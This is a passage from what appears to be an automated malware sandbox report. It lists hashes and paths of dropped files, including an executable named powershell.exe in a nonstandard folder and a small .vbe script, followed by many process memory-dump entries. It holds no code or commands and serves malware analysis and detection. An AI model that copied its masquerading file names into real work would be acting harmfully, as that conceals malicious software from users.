MD55e19d7f574fcf92dd71af5694d7c1c3a
SHA10f714c8b38a1e0c4f5c77d8ef4a71f015a9cc8c5
SHA2566901777e6814d122193a17d0dce499eb3de84744ee03821dc79ed4deed409289
SHA512018cddc429678f55ef2338fdc9b155bcbad883705ff61c702ae0cb179f4ac6b20c6a838f21530b4c7aeb39f21910e25b5af7253659d54b1649d50ab3b5707901
-
C:\containerServerWebMonitornet\powershell.exeFilesize
2.9MB
MD55e19d7f574fcf92dd71af5694d7c1c3a
SHA10f714c8b38a1e0c4f5c77d8ef4a71f015a9cc8c5
SHA2566901777e6814d122193a17d0dce499eb3de84744ee03821dc79ed4deed409289
SHA512018cddc429678f55ef2338fdc9b155bcbad883705ff61c702ae0cb179f4ac6b20c6a838f21530b4c7aeb39f21910e25b5af7253659d54b1649d50ab3b5707901
-
C:\containerServerWebMonitornet\powershell.exeFilesize
2.9MB
MD55e19d7f574fcf92dd71af5694d7c1c3a
SHA10f714c8b38a1e0c4f5c77d8ef4a71f015a9cc8c5
SHA2566901777e6814d122193a17d0dce499eb3de84744ee03821dc79ed4deed409289
SHA512018cddc429678f55ef2338fdc9b155bcbad883705ff61c702ae0cb179f4ac6b20c6a838f21530b4c7aeb39f21910e25b5af7253659d54b1649d50ab3b5707901
-
C:\containerServerWebMonitornet\powershell.exeFilesize
2.9MB
MD55e19d7f574fcf92dd71af5694d7c1c3a
SHA10f714c8b38a1e0c4f5c77d8ef4a71f015a9cc8c5
SHA2566901777e6814d122193a17d0dce499eb3de84744ee03821dc79ed4deed409289
SHA512018cddc429678f55ef2338fdc9b155bcbad883705ff61c702ae0cb179f4ac6b20c6a838f21530b4c7aeb39f21910e25b5af7253659d54b1649d50ab3b5707901
-
C:\containerServerWebMonitornet\powershell.exeFilesize
2.9MB
MD55e19d7f574fcf92dd71af5694d7c1c3a
SHA10f714c8b38a1e0c4f5c77d8ef4a71f015a9cc8c5
SHA2566901777e6814d122193a17d0dce499eb3de84744ee03821dc79ed4deed409289
SHA512018cddc429678f55ef2338fdc9b155bcbad883705ff61c702ae0cb179f4ac6b20c6a838f21530b4c7aeb39f21910e25b5af7253659d54b1649d50ab3b5707901
-
C:\containerServerWebMonitornet\powershell.exeFilesize
2.9MB
MD55e19d7f574fcf92dd71af5694d7c1c3a
SHA10f714c8b38a1e0c4f5c77d8ef4a71f015a9cc8c5
SHA2566901777e6814d122193a17d0dce499eb3de84744ee03821dc79ed4deed409289
SHA512018cddc429678f55ef2338fdc9b155bcbad883705ff61c702ae0cb179f4ac6b20c6a838f21530b4c7aeb39f21910e25b5af7253659d54b1649d50ab3b5707901
-
C:\containerServerWebMonitornet\powershell.exeFilesize
2.9MB
MD55e19d7f574fcf92dd71af5694d7c1c3a
SHA10f714c8b38a1e0c4f5c77d8ef4a71f015a9cc8c5
SHA2566901777e6814d122193a17d0dce499eb3de84744ee03821dc79ed4deed409289
SHA512018cddc429678f55ef2338fdc9b155bcbad883705ff61c702ae0cb179f4ac6b20c6a838f21530b4c7aeb39f21910e25b5af7253659d54b1649d50ab3b5707901
-
C:\containerServerWebMonitornet\powershell.exeFilesize
2.9MB
MD55e19d7f574fcf92dd71af5694d7c1c3a
SHA10f714c8b38a1e0c4f5c77d8ef4a71f015a9cc8c5
SHA2566901777e6814d122193a17d0dce499eb3de84744ee03821dc79ed4deed409289
SHA512018cddc429678f55ef2338fdc9b155bcbad883705ff61c702ae0cb179f4ac6b20c6a838f21530b4c7aeb39f21910e25b5af7253659d54b1649d50ab3b5707901
-
C:\containerServerWebMonitornet\qcbaWttH43WmPxKkpx5bHkWC.vbeFilesize
223B
MD56b048d7db1fc8755805ba0516caaff08
SHA11b9b638f2ac742c63c181881edf52c4ab3e26d06
SHA25654284cb2c34ef39686b46c5977cd56a4b3c842a7913821beb737572e8139ac53
SHA512bf44eff1ef4cdd79416237a5f76700ea95887b8a5274b41346c3abde451142edf9cb1d6e85c645361fe738a331615923fc30d28c623827cb63fa0bae983ff95f
-
\Windows\System32\config\systemprofile\AppData\Roaming\1751.tmpMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/636-590-0x0000000000000000-mapping.dmp
-
memory/940-145-0x0000000000000000-mapping.dmp
-
memory/940-506-0x0000000000000000-mapping.dmp
-
memory/1004-802-0x0000000000000000-mapping.dmp
-
memory/1036-562-0x0000000000000000-mapping.dmp
-
memory/1096-573-0x0000000000000000-mapping.dmp
-
memory/1304-642-0x0000014B2FFD0000-0x0000014B2FFEC000-memory.dmpFilesize
112KB
-
memory/1304-601-0x0000000000000000-mapping.dmp
-
memory/1304-688-0x0000014B2FFF0000-0x0000014B2FFFA000-memory.dmpFilesize
40KB
-
memory/1304-655-0x0000014B30190000-0x0000014B30249000-memory.dmpFilesize
740KB
-
memory/1452-1096-0x000000001B480000-0x000000001B492000-memory.dmpFilesize
72KB
-
memory/1452-1088-0x0000000002130000-0x000000000213A000-memory.dmpFilesize
40KB
-
memory/1576-500-0x0000000000000000-mapping.dmp
-
memory/1732-578-0x0000000000000000-mapping.dmp
-
memory/1816-811-0x0000000000000000-mapping.dmp
-
memory/1956-815-0x0000000000000000-mapping.dmp
-
memory/2096-1093-0x0000018813F20000-0x0000018813F26000-memory.dmpFilesize
24KB
-
memory/2096-1097-0x00000188137F0000-0x00000188137F7000-memory.dmpFilesize
28KB
-
memory/2244-535-0x0000000000000000-mapping.dmp
-
memory/2292-172-0x0000000000000000-mapping.dmp
-
memory/2416-560-0x0000000000000000-mapping.dmp
-
memory/2424-637-0x000000001B289000-0x000000001B28F000-memory.dmpFilesize
24KB
-
memory/2424-582-0x0000000000B40000-0x0000000000B48000-memory.dmpFilesize
32KB
-
memory/2424-1100-0x000000001D587000-0x000000001D58A000-memory.dmpFilesize
12KB
-
memory/2424-563-0x0000000000000000-mapping.dmp
-
memory/2424-595-0x0000000000ED0000-0x0000000000EDC000-memory.dmpFilesize
48KB
-
memory/2424-593-0x000000001C950000-0x000000001CE76000-memory.dmpFilesize
5.1MB
-
memory/2424-575-0x0000000000B30000-0x0000000000B3E000-memory.dmpFilesize
56KB
-
memory/2424-579-0x0000000000D90000-0x0000000000DAC000-memory.dmpFilesize
112KB
-
memory/2424-597-0x000000001B1B0000-0x000000001B1BA000-memory.dmpFilesize
40KB
-
memory/2424-1050-0x000000001D584000-0x000000001D587000-memory.dmpFilesize
12KB
-
memory/2424-1049-0x000000001D580000-0x000000001D584000-memory.dmpFilesize
16KB
-
memory/2424-1046-0x000000001D587000-0x000000001D58A000-memory.dmpFilesize
12KB
-
memory/2424-1045-0x000000001B289000-0x000000001B28F000-memory.dmpFilesize
24KB
-
memory/2424-598-0x000000001B1C0000-0x000000001B1CE000-memory.dmpFilesize
56KB
-
memory/2424-581-0x0000000000E20000-0x0000000000E70000-memory.dmpFilesize
320KB
-
memory/2424-599-0x000000001B1D0000-0x000000001B1D8000-memory.dmpFilesize
32KB
-
memory/2424-566-0x0000000000330000-0x000000000061C000-memory.dmpFilesize
2.9MB
-
memory/2424-600-0x000000001B1E0000-0x000000001B1E8000-memory.dmpFilesize
32KB
-
memory/2424-583-0x0000000000DB0000-0x0000000000DC0000-memory.dmpFilesize
64KB
-
memory/2424-594-0x0000000000E00000-0x0000000000E0C000-memory.dmpFilesize
48KB
-
memory/2424-586-0x0000000000DE0000-0x0000000000DF2000-memory.dmpFilesize
72KB
-
memory/2424-585-0x0000000000DC0000-0x0000000000DD6000-memory.dmpFilesize
88KB
-
memory/2424-591-0x0000000000DF0000-0x0000000000E02000-memory.dmpFilesize
72KB
-
memory/2424-603-0x000000001B1F0000-0x000000001B1FC000-memory.dmpFilesize
48KB
-
memory/2424-604-0x000000001B200000-0x000000001B20A000-memory.dmpFilesize
40KB
-
memory/2424-786-0x000000001D584000-0x000000001D587000-memory.dmpFilesize
12KB
-
memory/2424-785-0x000000001D580000-0x000000001D584000-memory.dmpFilesize
16KB
-
memory/2424-587-0x0000000000E70000-0x0000000000E80000-memory.dmpFilesize
64KB
-
memory/2424-589-0x0000000000E80000-0x0000000000ED6000-memory.dmpFilesize
344KB
-
memory/2424-606-0x000000001B210000-0x000000001B21C000-memory.dmpFilesize
48KB
-
memory/2644-816-0x0000000000000000-mapping.dmp
-
memory/2652-810-0x0000000000000000-mapping.dmp
-
memory/2828-350-0x0000000000000000-mapping.dmp
-
memory/2920-789-0x0000000000000000-mapping.dmp
-
memory/2976-150-0x0000000000000000-mapping.dmp
-
memory/3016-556-0x0000000000000000-mapping.dmp
-
memory/3036-485-0x0000000000000000-mapping.dmp
-
memory/3096-788-0x0000000000000000-mapping.dmp
-
memory/3136-580-0x0000000000000000-mapping.dmp
-
memory/3164-814-0x0000000000000000-mapping.dmp
-
memory/3240-238-0x0000000000000000-mapping.dmp
-
memory/3240-245-0x0000000000D80000-0x00000000011CA000-memory.dmpFilesize
4.3MB
-
memory/3292-115-0x0000000000000000-mapping.dmp
-
memory/3300-596-0x0000000000000000-mapping.dmp
-
memory/3316-518-0x0000000000000000-mapping.dmp
-
memory/3320-584-0x0000000000000000-mapping.dmp
-
memory/3332-483-0x0000000000000000-mapping.dmp
-
memory/3660-489-0x0000000000000000-mapping.dmp
-
memory/3660-793-0x0000000000000000-mapping.dmp
-
memory/3704-794-0x0000000000000000-mapping.dmp
-
memory/4092-602-0x0000000000000000-mapping.dmp
-
memory/4252-607-0x0000000000000000-mapping.dmp
-
memory/4260-1038-0x000001B47EA70000-0x000001B47EA8C000-memory.dmpFilesize
112KB
-
memory/4260-795-0x0000000000000000-mapping.dmp
-
memory/4344-574-0x0000000000000000-mapping.dmp
-
memory/4372-817-0x0000000000000000-mapping.dmp
-
memory/4380-592-0x0000000000000000-mapping.dmp
-
memory/4404-475-0x0000000000000000-mapping.dmp
-
memory/4420-209-0x0000000000000000-mapping.dmp
-
memory/4464-496-0x0000000000000000-mapping.dmp
-
memory/4488-796-0x0000000000000000-mapping.dmp
-
memory/4488-1065-0x00000000003D0000-0x00000000006BC000-memory.dmpFilesize
2.9MB
-
memory/4496-522-0x0000000000000000-mapping.dmp
-
memory/4548-487-0x0000000000000000-mapping.dmp
-
memory/4612-790-0x0000000000000000-mapping.dmp
-
memory/4632-494-0x0000000000000000-mapping.dmp
-
memory/4656-456-0x0000000005450000-0x000000000549B000-memory.dmpFilesize
300KB
-
memory/4656-783-0x0000000007010000-0x000000000702E000-memory.dmpFilesize
120KB
-
memory/4656-255-0x0000000077100000-0x000000007728E000-memory.dmpFilesize
1.6MB
-
memory/4656-257-0x0000000077100000-0x000000007728E000-memory.dmpFilesize
1.6MB
-
memory/4656-260-0x0000000077100000-0x000000007728E000-memory.dmpFilesize
1.6MB
-
memory/4656-286-0x0000000077100000-0x000000007728E000-memory.dmpFilesize
1.6MB
-
memory/4656-281-0x0000000077100000-0x000000007728E000-memory.dmpFilesize
1.6MB
-
memory/4656-779-0x0000000007A80000-0x0000000007F7E000-memory.dmpFilesize
5.0MB
-
memory/4656-778-0x0000000006E90000-0x0000000006F06000-memory.dmpFilesize
472KB
-
memory/4656-777-0x0000000006DF0000-0x0000000006E82000-memory.dmpFilesize
584KB
-
memory/4656-278-0x0000000077100000-0x000000007728E000-memory.dmpFilesize
1.6MB
-
memory/4656-636-0x00000000068D0000-0x0000000006936000-memory.dmpFilesize
408KB
-
memory/4656-633-0x0000000007050000-0x000000000757C000-memory.dmpFilesize
5.2MB
-
memory/4656-632-0x0000000006950000-0x0000000006B12000-memory.dmpFilesize
1.8MB
-
memory/4656-276-0x0000000077100000-0x000000007728E000-memory.dmpFilesize
1.6MB
-
memory/4656-274-0x0000000077100000-0x000000007728E000-memory.dmpFilesize
1.6MB
-
memory/4656-262-0x0000000077100000-0x000000007728E000-memory.dmpFilesize
1.6MB
-
memory/4656-258-0x0000000077100000-0x000000007728E000-memory.dmpFilesize
1.6MB
-
memory/4656-251-0x0000000000000000-mapping.dmp
-
memory/4656-436-0x0000000000BA0000-0x0000000000BBE000-memory.dmpFilesize
120KB
-
memory/4656-458-0x00000000056C0000-0x00000000057CA000-memory.dmpFilesize
1.0MB
-
memory/4656-439-0x0000000005AF0000-0x00000000060F6000-memory.dmpFilesize
6.0MB
-
memory/4656-441-0x00000000053B0000-0x00000000053C2000-memory.dmpFilesize
72KB
-
memory/4656-446-0x0000000005410000-0x000000000544E000-memory.dmpFilesize
248KB
-
memory/4672-266-0x0000000000000000-mapping.dmp
-
memory/4716-116-0x0000000000000000-mapping.dmp
-
memory/4720-567-0x0000000000000000-mapping.dmp
-
memory/4724-138-0x000001C6FD780000-0x000001C6FD78A000-memory.dmpFilesize
40KB
-
memory/4724-117-0x0000000000000000-mapping.dmp
-
memory/4724-124-0x000001C6FD5F0000-0x000001C6FD612000-memory.dmpFilesize
136KB
-
memory/4724-129-0x000001C6FE2C0000-0x000001C6FE336000-memory.dmpFilesize
472KB
-
memory/4724-136-0x000001C6FD620000-0x000001C6FD62A000-memory.dmpFilesize
40KB
-
memory/4816-588-0x0000000000000000-mapping.dmp
-
memory/4820-605-0x0000000000000000-mapping.dmp
-
memory/4860-501-0x0000000000000000-mapping.dmp
-
memory/4868-159-0x0000000000000000-mapping.dmp
-
memory/4868-481-0x0000000000000000-mapping.dmp
-
memory/4888-608-0x0000000000000000-mapping.dmp
-
memory/4932-504-0x0000000000000000-mapping.dmp
-
memory/4940-805-0x0000000000000000-mapping.dmp
-
memory/5016-792-0x0000000000000000-mapping.dmp
-
memory/5060-299-0x0000000077100000-0x000000007728E000-memory.dmpFilesize
1.6MB
-
memory/5060-284-0x0000000077100000-0x000000007728E000-memory.dmpFilesize
1.6MB
-
memory/5060-270-0x0000000077100000-0x000000007728E000-memory.dmpFilesize
1.6MB
-
memory/5060-269-0x0000000077100000-0x000000007728E000-memory.dmpFilesize
1.6MB
-
memory/5060-268-0x0000000077100000-0x000000007728E000-memory.dmpFilesize
1.6MB
-
memory/5060-293-0x0000000077100000-0x000000007728E000-memory.dmpFilesize
1.6MB
-
memory/5060-275-0x0000000077100000-0x000000007728E000-memory.dmpFilesize
1.6MB
-
memory/5060-277-0x0000000077100000-0x000000007728E000-memory.dmpFilesize
1.6MB
-
memory/5060-287-0x0000000077100000-0x000000007728E000-memory.dmpFilesize
1.6MB
-
memory/5060-279-0x0000000077100000-0x000000007728E000-memory.dmpFilesize
1.6MB
-
memory/5060-312-0x0000000077100000-0x000000007728E000-memory.dmpFilesize
1.6MB
-
memory/5060-316-0x0000000077100000-0x000000007728E000-memory.dmpFilesize
1.6MB
-
memory/5060-291-0x0000000077100000-0x000000007728E000-memory.dmpFilesize
1.6MB
-
memory/5060-292-0x0000000077100000-0x000000007728E000-memory.dmpFilesize
1.6MB
-
memory/5060-300-0x0000000077100000-0x000000007728E000-memory.dmpFilesize
1.6MB
-
memory/5060-302-0x0000000077100000-0x000000007728E000-memory.dmpFilesize
1.6MB
-
memory/5060-294-0x0000000077100000-0x000000007728E000-memory.dmpFilesize
1.6MB
-
memory/5060-298-0x0000000077100000-0x000000007728E000-memory.dmpFilesize
1.6MB
-
memory/5060-320-0x0000000077100000-0x000000007728E000-memory.dmpFilesize
1.6MB
-
memory/5060-333-0x0000000077100000-0x000000007728E000-memory.dmpFilesize
1.6MB
-
memory/5060-264-0x0000000077100000-0x000000007728E000-memory.dmpFilesize
1.6MB
-
memory/5060-263-0x0000000077100000-0x000000007728E000-memory.dmpFilesize
1.6MB
-
memory/5060-289-0x0000000077100000-0x000000007728E000-memory.dmpFilesize
1.6MB
-
memory/5060-304-0x0000000077100000-0x000000007728E000-memory.dmpFilesize
1.6MB
-
memory/5060-301-0x0000000077100000-0x000000007728E000-memory.dmpFilesize
1.6MB
-
memory/5060-259-0x0000000077100000-0x000000007728E000-memory.dmpFilesize
1.6MB
-
memory/5060-306-0x0000000077100000-0x000000007728E000-memory.dmpFilesize
1.6MB
-
memory/5060-296-0x0000000077100000-0x000000007728E000-memory.dmpFilesize
1.6MB
-
memory/5060-324-0x0000000077100000-0x000000007728E000-memory.dmpFilesize
1.6MB
-
memory/5060-308-0x0000000077100000-0x000000007728E000-memory.dmpFilesize
1.6MB
-
memory/5060-310-0x0000000077100000-0x000000007728E000-memory.dmpFilesize
1.6MB
-
memory/5060-311-0x0000000077100000-0x000000007728E000-memory.dmpFilesize
1.6MB
-
memory/5060-313-0x0000000077100000-0x000000007728E000-memory.dmpFilesize
1.6MB
-
memory/5060-317-0x0000000077100000-0x000000007728E000-memory.dmpFilesize
1.6MB
-
memory/5060-329-0x0000000077100000-0x000000007728E000-memory.dmpFilesize
1.6MB
-
memory/5060-272-0x0000000077100000-0x000000007728E000-memory.dmpFilesize
1.6MB
-
memory/5060-253-0x0000000077100000-0x000000007728E000-memory.dmpFilesize
1.6MB
-
memory/5060-252-0x0000000077100000-0x000000007728E000-memory.dmpFilesize
1.6MB
-
memory/5060-243-0x0000000077100000-0x000000007728E000-memory.dmpFilesize
1.6MB
-
memory/5060-249-0x0000000077100000-0x000000007728E000-memory.dmpFilesize
1.6MB
-
memory/5060-246-0x0000000077100000-0x000000007728E000-memory.dmpFilesize
1.6MB
-
memory/5060-323-0x0000000077100000-0x000000007728E000-memory.dmpFilesize
1.6MB
-
memory/5060-239-0x0000000077100000-0x000000007728E000-memory.dmpFilesize
1.6MB
-
memory/5060-331-0x0000000077100000-0x000000007728E000-memory.dmpFilesize
1.6MB
-
memory/5060-232-0x0000000000000000-mapping.dmp
-
memory/5060-341-0x0000000077100000-0x000000007728E000-memory.dmpFilesize
1.6MB
-
memory/5060-267-0x0000000077100000-0x000000007728E000-memory.dmpFilesize
1.6MB
-
memory/5060-346-0x0000000077100000-0x000000007728E000-memory.dmpFilesize
1.6MB
-
memory/5060-265-0x0000000077100000-0x000000007728E000-memory.dmpFilesize
1.6MB
-
memory/5060-343-0x0000000077100000-0x000000007728E000-memory.dmpFilesize
1.6MB
-
memory/5060-271-0x0000000077100000-0x000000007728E000-memory.dmpFilesize
1.6MB
-
memory/5060-307-0x0000000077100000-0x000000007728E000-memory.dmpFilesize
1.6MB
-
memory/5060-309-0x0000000077100000-0x000000007728E000-memory.dmpFilesize
1.6MB
-
memory/5060-335-0x0000000077100000-0x000000007728E000-memory.dmpFilesize
1.6MB
-
memory/5060-273-0x0000000077100000-0x000000007728E000-memory.dmpFilesize
1.6MB
-
memory/5080-476-0x0000000000000000-mapping.dmp